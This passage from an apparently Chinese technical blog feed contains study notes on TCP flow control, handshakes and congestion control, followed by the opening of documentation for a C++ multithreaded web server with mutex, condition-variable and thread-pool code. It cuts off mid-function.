认的字节的最小序号</strong>和<strong>下一个要发送的字节的序号</strong>。</p></li><li><p>许多TCP实现会将正确接收但失序的报文段<strong>缓存</strong>起来。</p></li><li><p>对TCP提出的修改意见是<strong>选择确认</strong>。它允许TCP接收方有选择地确认失序报文段，而不是累计地确认最后一个正确接收的有序报文段。</p></li></ul><blockquote><p>TCP的差错恢复机制是 GBN协议和SR协议的混合体。</p></blockquote></li></ul><h4 id="e-流量控制">e. 流量控制</h4><ul><li><p>TCP为应用程序提供<strong>流量控制</strong>服务以消除发送方使接收方缓存溢出的可能性。</p></li><li><p>TCP发送方也可能因为IP网络的拥塞而被设置，这种形式的发送方的控制被称为<strong>拥塞控制</strong>。</p><blockquote><p>注意：拥塞控制和流量控制不同，需要区分开来。</p></blockquote></li><li><p>TCP通过让<strong>发送方</strong>维护一个称为<strong>接收窗口</strong>的变量来提供流量控制。接受窗口用于告诉<strong>发送方</strong>，<strong>当前接收方</strong>还有多少可用的缓存空间。TCP是全双工通信，在连接两端的发送方都各自维护一个接收窗口。</p><p><img src="/2021/05/cnatda-1/image-20210515000223929.png" alt="image-20210515000223929"></p><p>假设主机A通过一条TCP连接向主机B发送一个大文件。则主机B通过把当前的 <strong>接收窗口rwnd</strong> 值放入它发给主机A的报文段<strong>接收窗口字段</strong>中，通知主机A在该连接的缓存中还有多少可用空间。</p></li><li><p>还有一个问题：假设主机B的接收缓存已满，使得 rwnd = 0，并且主机B没有任何数据要发给主机A（这种假设是为了确保主机AB之间<strong>没有任何的分组通信</strong>）。则因为主机B上的应用进程清空缓存时，TCP不会向主机A发送带有 rwnd 新值的新报文段，这样就会使得<strong>主机A无法知道主机B的接收缓存已经有新的空间了</strong>。因此<strong>主机A将会被阻塞，而无法再发送数据</strong>。</p><p>对于这个问题，TCP规范中要求：**当主机B的接收窗口为0时，主机A继续发送只有一个字节数据的报文段，这些报文段将会被接收方确认。**等到最终主机B的缓存清空，返回的确认报文中将包含一个非零的 rwnd 值。</p></li></ul><h4 id="f-TCP-连接管理">f. TCP 连接管理</h4><ul><li><p>TCP连接流程</p><ul><li><p>客户端TCP首先向服务器端的TCP发送一个特殊TCP报文段。该报文段中不包含应用层数据，而是在报文段首部设置 <strong>SYN 比特为1</strong>. 该特殊报文段被称为 <strong>SYN 报文段</strong>。</p><p>同时，客户端会<strong>随机选择</strong>一个<strong>初始序号 client_isn</strong>，并将此编号放置进该起始的TCP SYN 报文段的<strong>序号字段</strong>中。</p><blockquote><p>注意：适当的随机选择 client_isn 在避免某些安全性攻击方面起到了一定的作用。</p></blockquote></li><li><p>当 TCP SYN 报文段到达服务器主机，则服务器会为该TCP连接<strong>分配 TCP 缓存和变量</strong>，并向该客户TCP发送允许连接的报文段。</p><blockquote><p>注意：提前分配缓存和变量可能受到 SYN 攻击。</p></blockquote><p>该报文段也不包含应用层数据，而是设置</p><ul><li><strong>SYN 比特为1</strong></li><li>TCP报文首部的<strong>确认号</strong>为 client_isn + 1</li><li>TCP报文首部的<strong>序号字段</strong>为 服务器的初始序号 server_isn 。</li></ul><p>该允许连接的报文段被称为 <strong>SYNACK报文段</strong>。</p></li><li><p>当客户端收到 SYNACK 报文段时，客户端也为该连接分配缓存和变量。之后客户端向服务器发送最后一个报文段，<strong>对服务器的允许连接报文进行确认</strong>（客户端将值server_isn + 1防止进TCP报文段首部的确认字段）。由于连接已经建立，因此<strong>SYN比特置0</strong>。</p><p>在这个确认报文中，<strong>可以带上客户端到服务器的数据</strong>。</p></li></ul><p>为了创建连接，TCP会在两台主机之间发送3个分组，因此这个连接过程通常称为<strong>三次握手</strong>。</p><p><img src="/2021/05/cnatda-1/image-20210515092421032.png" alt="image-20210515092421032"></p></li><li><p>TCP连接拆除</p><p>参与一条TCP连接的两个进程中的任何一个都能终止该连接。</p><p><img src="/2021/05/cnatda-1/image-20210515092825158.png" alt="image-20210515092825158"></p></li></ul><h4 id="g-拥塞控制原理">g. 拥塞控制原理</h4><ul><li><p>拥塞原因与代价</p><ul><li><p>假设主机A、B在容量为R的共享式输出链路上传播。当发送速率接近 R/2 时，平均使用时延将会越来越大。当发送速率超过 R/2 时，路由器中的平均排队分组数就会无限增长，源与目的地之间的平均时延也会变成无穷大。</p></li><li><p>发送方必须执行重传以补偿因为缓存溢出而丢弃的分组。</p></li><li><p>发送方在遇到大的时延时所进行的<strong>不必要重传</strong>会引起路由器利用其链路带宽来<strong>转发不必要的分组副本</strong>。</p></li><li><p>当一个分组沿着一条路径被丢弃时，每个上游路由器用于<strong>转发该分组到丢弃该分组</strong>而使用的传输容量最终被浪费掉了。</p></li></ul></li><li><p>拥塞控制方法</p><ul><li>端到端拥塞控制：由于网络层<strong>没有</strong>为运输层提供<strong>显式支持</strong>，因此即便网络中存在拥塞，端系统也必须通过对网络行为的观察来推断。例如通过超时或冗余ACK确认。</li><li>网络辅助的拥塞控制：在网络辅助的拥塞控制中，路由器向发送方提供关于网络中拥塞状态的显式反馈信息。这类拥塞信息从网络反馈到发送方通常有两种方式：<ul><li>直接反馈信息：由网络路由器发给发送方。这种方式通常采用一种阻塞分组的形式。</li><li>更通用的第二种形式：路由器标记或更新从发送方流向接收方的分组中的某个字段来表示拥塞的产生。当收到一个标记的分组后，接收方就会向发送方通知该网络拥塞指示。</li></ul></li></ul></li></ul><h4 id="h-TCP-拥塞控制">h. TCP 拥塞控制</h4><ul><li><p>TCP采用的方式是让每一个发送方<strong>根据所感知到的网络拥塞程度</strong>来限制其能向连接发送流量的速率。</p><p>运行在发送方的 TCP 拥塞控制机制跟踪一个额外的变量：<strong>拥塞窗口cwnd</strong>。它限制了一个TCP发送方能向网络中发送流量的速率。即 $LastByteSend - LastByteAcked &lt;= min{cwnd, rwnd}$。发送速率为$min{cwnd, wrnd} / RTT$ 字节/秒。</p></li><li><p>TCP发送方怎样确定它应当发送的速率?</p><ul><li>一个丢失的报文段表意味着拥塞。因此当丢失报文段时应当降低TCP发送方的速率。</li><li>一个确认报文段表示该网络正在向接收方交付发送方的报文段，因此当对先前为确认报文段的确认到达时，能够增加发送方的速率。</li><li>带宽探测。</li></ul></li><li><p>TCP拥塞控制算法</p><ul><li><p><strong>慢启动</strong></p><ul><li><p>慢启动起始阶段</p><p>在慢启动状态，cwnd的值以1个MSS开始并且每当传输的报文段首次被确认就增加1个MSS。这会使得每过一个RTT，发送速率就翻倍。</p><p>TCP发送速率起始慢，但在慢启动阶段以指数增长。</p></li><li><p>慢启动结束阶段</p><p>如果存在一个由<strong>超时指示</strong>的丢包事件（注意，不包括冗余指示的丢包），TCP发送方将cwnd设置为1并重新开始慢启动过程。同时还将第二个状态变量的值**ssthresh（慢启动阈值）**设置为 cwnd/2。</p><p>当cwnd的值等于 ssthresh 时，结束慢启动并且TCP转移到<strong>拥塞避免模式</strong>。此时TCP会更为谨慎的增加 cwnd。</p><p>如果检测到3个冗余ACK，则TCP执行快速重传并进入<strong>快速恢复</strong>状态。</p></li></ul></li><li><p><strong>拥塞避免</strong></p><p>一旦进入拥塞避免状态，cwnd的值大约是上次遇到拥塞时的值的一半，此时采用一种较保守的方法：<strong>每个RTT</strong>只将cwnd的值增加一个MSS。</p><blockquote><p>注意区分开，慢启动初始时是<strong>每个报文段被确认</strong>则增加一个MSS。而这里是<strong>每个RTT</strong>增加一个MSS。</p></blockquote><p>对于冗余ACK指示的丢包事件来说，TCP将cwnd减半，并且当收到3个冗余ACK时，将ssthresh的值记录为cwnd的值的一半。</p></li><li><p><strong>快速恢复</strong></p><ul><li>在快速恢复中，对于引进TCP进入快速恢复状态的缺失报文段，对收到的每个冗余ACK，cwnd的值增加一个MSS。最终当对丢失报文段的一个ACK到达时，TCP在降低cwnd后进入拥塞避免状态。</li><li>如果出现超时事件，快速恢复在执行如同在慢启动和拥塞避免中相同的动作后，迁移到慢启动状态：当丢包事件出现时，cwnd的值被设置为1个MSS，并且ssthresh的值设置为 cwnd 值的一半。</li></ul></li></ul><p><img src="/2021/05/cnatda-1/image-20210515131916271.png" alt="image-20210515131916271"></p></li><li><p>公平性</p><p>TCP会在多条连接之间平等共享带宽，但UDP因为没有拥塞控制机制，因此UDP源有可能容易压制TCP流量。</p></li><li><p>明确拥塞通告：网络辅助拥塞控制</p><ul><li>对于IP和TCP的扩展方案 RFC3168 允许网络明确向TCP发送方和接收方发出拥塞信号。这种形式的网络辅助拥塞控制称为<strong>明确拥塞通告（Explicit Congestion Notification, ECN）</strong>，涉及到TCP和IP协议。</li><li>在网络层，<strong>IP数据报</strong>首部的服务类型字段中的<strong>两个比特</strong>被用于ECN。路由器所使用的一种ECN比特设置表示该路由器<strong>正在历经阻塞</strong>。该阻塞标志则由被标记的IP数据报所携带，送给<strong>目的主机</strong>，再由<strong>目的主机</strong>通知<strong>发送主机</strong>。</li><li>RFC3168 推荐仅当拥塞持续不断存在时才设置 ECN比特。发送主机所使用的另一种ECN比特设置通知路由器发送方和接收方是ECN使能的，因此能够对ECN指示的网络拥塞中采取行动。</li><li>除了TCP以外的其他运输层协议也可以利用网络层发送ECN信号。</li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里记录了笔者阅读《计算机网络：自顶向下方法》的一些笔记。笔记有所缩略。&lt;/li&gt;
&lt;li&gt;主要关于
&lt;ul&gt;
&lt;li&gt;第一章：计算机网络和因特网&lt;/li&gt;
&lt;li&gt;第二章：应用层&lt;/li&gt;
&lt;li&gt;第三章：运输层&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
  </entry>
  
  <entry>
    <title>WebServer v1.0 文档</title>
    <link href="https://kiprey.github.io/2021/05/WebServer-1/"/>
    <id>https://kiprey.github.io/2021/05/WebServer-1/</id>
    <published>2021-05-11T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.798Z</updated>
    
    <content type="html"><![CDATA[<h2 id="概述">概述</h2><p>WebServer 1.0 简单实现了一个基础的 <strong>多并发网络服务程序</strong> 。在该版本中，主要实现了以下重要内容：</p><ul><li>线程互斥锁 &amp; 条件变量的封装</li><li>线程池的设计，以支持并发</li><li>基础网络连接的实现</li><li>http 协议的简略支持<ul><li>支持部分常用 HTTP 报文<ul><li>200 OK</li><li>400 Bad Request</li><li>500 Internal Server Error</li><li>501 Not Implemented</li><li>505 HTTP Version Not Supported</li></ul></li><li>支持 HTTP GET 请求</li><li>支持 HTTP/1.1 <strong>持续连接</strong> 特性</li></ul></li></ul><p>1.0 版本的项目代码位于 <a href="https://github.com/Kiprey/WebServer/tree/4095ccc6fd3facd3988ea71178cacad7b4e0dd13">Kiprey/WebServer CommitID: 4095cc - github</a></p><p>最新版本的项目代码位于 <a href="https://github.com/Kiprey/WebServer">Kiprey/WebServer - github</a></p><span id="more"></span><p>运行示例：</p><p><img src="/2021/05/WebServer-1/image-20210512133857068.png" alt="image-20210512133857068"></p><blockquote><p>注意：该程序的实现大量参考了 <a href="https://github.com/linyacool/WebServer">linyacool/WebServer - github</a> 的代码。</p></blockquote><h2 id="一、互斥锁-条件变量">一、互斥锁 &amp; 条件变量</h2><h3 id="1-互斥锁">1. 互斥锁</h3><p>对于当前的多线程程序来说，可能会出现多个线程同时读写同一个数据结构的情况，那么此时势必会造成脏读这种错误情况。而互斥锁的使用，是为了保证数据共享操作的完整性，确保任一时刻，只能有一个线程访问目标对象。</p><p>在linux中，互斥锁主要使用以下函数来实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 初始化 mutex 对象</span></span><br><span class="line"><span class="type">pthread_mutex_t</span> mutex = PTHREAD_MUTEX_INITIALIZER;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_init</span><span class="params">(<span class="type">pthread_mutex_t</span> *restrict mutex,</span></span></span><br><span class="line"><span class="params"><span class="function">                        <span class="type">const</span> <span class="type">pthread_mutexattr_t</span> *restrict attr)</span></span>;</span><br><span class="line"><span class="comment">// mutex 加锁，在获得锁之前将会阻塞</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_lock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// mutex 加锁，如果能马上获取锁则返回0，无法获取锁则马上返回errno</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_trylock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// mutex 释放锁</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_unlock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// 销毁 mutex 对象</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_destroy</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br></pre></td></tr></table></figure><p>由于 pthread 族的库函数名称较长，并且调用方式也互不相同，因此在这些库函数上做了一个简单的封装：</p><blockquote><p>注意，这实际上就是<strong>RAII（资源获取即初始化）</strong>，是C++等编程语言常用的管理资源、避免内存泄露的方法。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief MutexLock 将 pthread_mutex 封装成一个类, </span></span><br><span class="line"><span class="comment"> *        这样做的好处是不用记住那些繁杂的 pthread 开头的函数使用方式</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MutexLock</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="type">pthread_mutex_t</span> mutex_;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="built_in">MutexLock</span>()     &#123; <span class="built_in">pthread_mutex_init</span>(&amp;mutex_, <span class="literal">nullptr</span>); &#125;</span><br><span class="line">    ~<span class="built_in">MutexLock</span>()    &#123; <span class="built_in">pthread_mutex_destroy</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">lock</span><span class="params">()</span>     </span>&#123; <span class="built_in">pthread_mutex_lock</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">unlock</span><span class="params">()</span>   </span>&#123; <span class="built_in">pthread_mutex_unlock</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">pthread_mutex_t</span>* <span class="title">getMutex</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> &amp;mutex_; &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>正常来说，我们使用锁时，需要经过以下过程：<strong>获取锁-&gt;进入临界区-&gt;释放锁</strong>。但在实际使用锁时，容易忘记释放锁，而这是一个非常严重的错误。因此我们可以实现一个 <code>MutexLockGuard</code>类，借助类的构造函数和析构函数，来帮助我们自动获取锁和释放锁，只需一个简单的声明即可<strong>获取锁&amp;释放锁</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief MutexLockGuard 主要是为了自动获取锁/释放锁, 防止意外情况下忘记释放锁</span></span><br><span class="line"><span class="comment"> *        而且块状的锁定区域更容易让人理解代码</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MutexLockGuard</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    MutexLock&amp; lock_;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 声明 MutexLockGuard 时自动上锁</span></span><br><span class="line"><span class="comment">     * @param lock 待锁定的资源</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="built_in">MutexLockGuard</span>(MutexLock&amp; mutex) : <span class="built_in">lock_</span>(mutex) &#123; lock_.<span class="built_in">lock</span>(); &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 当前作用域结束时自动释放锁, 防止遗忘</span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    ~<span class="built_in">MutexLockGuard</span>() &#123; lock_.<span class="built_in">unlock</span>(); &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="2-条件变量">2. 条件变量</h3><p>一说起条件变量，就不得不说先说起<strong>管程</strong>。管程保证了<strong>同一时刻只有一个线程在管程内活动</strong>，但<strong>不能保证</strong>线程在进入管程后，能继续一次性执行下去直到管程结束。</p><blockquote><p>例如某个线程好不容易进入了管程，但执行了一段时间，突然发现某个条件没有满足，使得当前线程必须阻塞，无法继续执行。但要是该线程原地阻塞，一直占用这个管程，那其他的线程自然就无法进入管程，造成死锁。</p></blockquote><p>那该怎么办呢？这就轮到条件变量出场了。</p><p>继续以上面的这个例子为例，由于该线程进入管程后可能会阻塞，因此非常肯定的是，必须在该进程进入阻塞状态前释放管程，否则会造成死锁。但是该线程已经进入管程，且没办法继续执行下去，因此只能<strong>原地释放管程</strong>，并等待<strong>条件</strong>满足后，<strong>重新获取管程锁</strong>，并将该线程唤醒，使其继续执行。</p><p>条件变量起到的作用，就相当于控制线程在管程中挂起和唤醒的作用。上面的语句可能有点难以理解，请思考一下这个例子：</p><blockquote><p>线程池中，当子线程需要读取事件队列来获取事件之前，需要先获取队列的锁。当子线程获取到锁以后，如果队列为空，则条件不满足（注意这里的条件是：<strong>队列非空</strong>），因此子线程就无法从中获取事件，没法继续执行。此时可以使用条件变量让子线程在管程中挂起，等到条件满足时再通过条件变量来唤醒，回到管程继续执行。</p><p>注意：使用条件变量时，一定要确保<strong>在已经获取到管程锁的前提下</strong>使用，否则条件变量容易被多个子线程修改/使用。</p></blockquote><p>条件变量相关的函数如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 初始化条件变量</span></span><br><span class="line"><span class="type">pthread_cond_t</span> cond = PTHREAD_COND_INITIALIZER;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_init</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">const</span> <span class="type">pthread_condattr_t</span> *restrict attr)</span></span>;</span><br><span class="line"><span class="comment">// 唤醒 **至少一个** 被目标条件变量阻塞的线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_signal</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br><span class="line"><span class="comment">// 唤醒 **所有** 被目标条件变量阻塞的线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_broadcast</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br><span class="line"><span class="comment">// 让目标条件变量阻塞当前线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_wait</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">pthread_mutex_t</span> *restrict mutex)</span></span>;</span><br><span class="line"><span class="comment">// 让目标条件变量阻塞当前线程，并设置最大阻塞时间</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_timedwait</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="type">pthread_mutex_t</span> *restrict mutex,</span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="type">const</span> <span class="keyword">struct</span> timespec *restrict abstime)</span></span>;</span><br><span class="line"><span class="comment">// 销毁条件变量</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_destroy</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br></pre></td></tr></table></figure><p>与上面的互斥锁一样，这里也实现了一个 <code>Condition</code>类来简化条件变量的使用：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief 条件变量,主要用于多线程中的锁 </span></span><br><span class="line"><span class="comment"> *        与 MutexLock 一致,无需记住繁杂的函数名称</span></span><br><span class="line"><span class="comment"> *        条件变量主要是与mutex进行搭配,常用于资源分配相关的场景,</span></span><br><span class="line"><span class="comment"> *        例如当某个线程获取到锁以后,发现没有资源,则此时可以释放资源并等待条件变量</span></span><br><span class="line"><span class="comment"> * @note  注意: 使用条件变量时,必须上锁,防止出现多个线程共同使用条件变量</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Condition</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    MutexLock&amp; lock_;       <span class="comment">// 目标 Mutex 互斥锁</span></span><br><span class="line">    <span class="type">pthread_cond_t</span> cond_;   <span class="comment">// 条件变量</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="built_in">Condition</span>(MutexLock&amp; mutex) : <span class="built_in">lock_</span>(mutex) &#123; <span class="built_in">pthread_cond_init</span>(&amp;cond_, <span class="literal">nullptr</span>); &#125;</span><br><span class="line">    ~<span class="built_in">Condition</span>()        &#123; <span class="built_in">pthread_cond_destroy</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">notify</span><span class="params">()</span>       </span>&#123; <span class="built_in">pthread_cond_signal</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">notifyAll</span><span class="params">()</span>    </span>&#123; <span class="built_in">pthread_cond_broadcast</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">wait</span><span class="params">()</span>         </span>&#123; <span class="built_in">pthread_cond_wait</span>(&amp;cond_, lock_.<span class="built_in">getMutex</span>()); &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     *  @brief  等待当前的条件变量一段时间</span></span><br><span class="line"><span class="comment">     *  @param  sec 等待的时间(单位:秒)</span></span><br><span class="line"><span class="comment">     *  @return 成功在时间内等待到则返回 true, 超时则返回 false</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">waitForSeconds</span><span class="params">(<span class="type">size_t</span> sec)</span>   </span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        timespec abstime;</span><br><span class="line">        <span class="comment">// 获取当前系统真实时间</span></span><br><span class="line">        <span class="built_in">clock_gettime</span>(CLOCK_REALTIME, &amp;abstime);</span><br><span class="line">        abstime.tv_sec += (<span class="type">time_t</span>)sec;</span><br><span class="line">        <span class="keyword">return</span> ETIMEDOUT != <span class="built_in">pthread_cond_timedwait</span>(&amp;cond_, lock_.<span class="built_in">getMutex</span>(), &amp;abstime);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h2 id="二、线程池">二、线程池</h2><h3 id="1-概述">1. 概述</h3><ul><li><p>线程池是一种多线程的处理方式，常常用在高并发服务器上。线程池可以有效的利用高并发服务器上的线程资源。</p></li><li><p>线程用于处理各个请求，其流程大致为：<strong>创建线程 =&gt; 传递信息至子线程 =&gt; 线程分离 =&gt; 线程运行 =&gt; 线程销毁</strong>。对于较小规模的通信来说，上述的这个流程可以满足基本需求。但是对于高并发服务器来说，重复的创建线程与销毁线程，其开销不可忽视。因此可以使用线程池来让线程复用。</p></li></ul><h3 id="2-实现前的准备工作">2. 实现前的准备工作</h3><ul><li><p>对于一个线程所要执行的任务，我们需要明确以下几点：</p><ul><li>当前线程所要执行的函数，最好是与主线程没有较大关联的，即尽量降低耦合性。</li></ul></li><li><p>所要执行的事件，可以传入一个参数，但需要明确<strong>不能有返回值</strong>。</p><blockquote><p>要想有应该也可以做，不过这就是后面的事情了。</p></blockquote><p>因此，我们便可以设计出以下的 task 结构体</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 每个线程的基本事件单元</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ThreadpoolTask</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">void</span> (*function)(<span class="type">void</span>*);</span><br><span class="line">    <span class="type">void</span>* arguments;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>线程池除了一些特定的变量（线程个数、事件队列等等）以外，还需要<strong>互斥锁</strong>以及<strong>条件变量</strong>。</p><ul><li>对于每个线程来说，这些线程是有可能同时访问线程池，因此需要在每个线程访问之前<strong>加以上锁</strong>。</li><li>上锁之后，对于每个线程来说，有可能出现这种<strong>获取到锁，但没有事件可以执行</strong>的情况。对于这类情况，子线程必须先释放锁等待事件的到来，等到事件到来之后再重新上锁，获取事件，而这就是<strong>条件变量</strong>的用处。</li></ul></li></ul><h3 id="3-子线程的目标函数">3. 子线程的目标函数</h3><p>由于子线程只会在<strong>线程池创建之时创建</strong>，在<strong>线程池销毁之时销毁</strong>，因此，在子线程中必然要执行一个事件循环，其中重复执行 <strong>获取事件、执行事件</strong> 的动作。</p><p>但这里需要注意两件事情，</p><ol><li>获取事件时，需要给线程池上锁，因为要访问消息队列；必要时刻还需要设置条件变量来暂时释放锁。</li><li>当线程池被销毁时，子线程该如何终止？</li></ol><p>针对问题2，有两种方式：</p><ol><li>一种是在线程池设置一个标志，子线程定期轮询该标志以确认是否退出。</li><li>再一种就是当前所实现的：添加一个<strong>退出事件</strong>至事件队列中，子线程执行到该事件时自动退出。</li></ol><p>因此具体实现的代码如下所示：</p><blockquote><p>注意，<code>pthread_cond_signal</code> 会唤醒<strong>至少</strong>一个线程，注意是<strong>至少</strong>。因此可能会出现唤醒多个线程但只有一个事件等待处理的情况。针对于这种情况，只需设置子线程在被唤醒后，循环检测是否有剩余事件等待处理即可。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span>* <span class="title">ThreadPool::TaskForWorkerThreads_</span><span class="params">(<span class="type">void</span>* arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ThreadPool* pool = (ThreadPool*)arg;</span><br><span class="line">    <span class="comment">// 启动当前线程</span></span><br><span class="line">    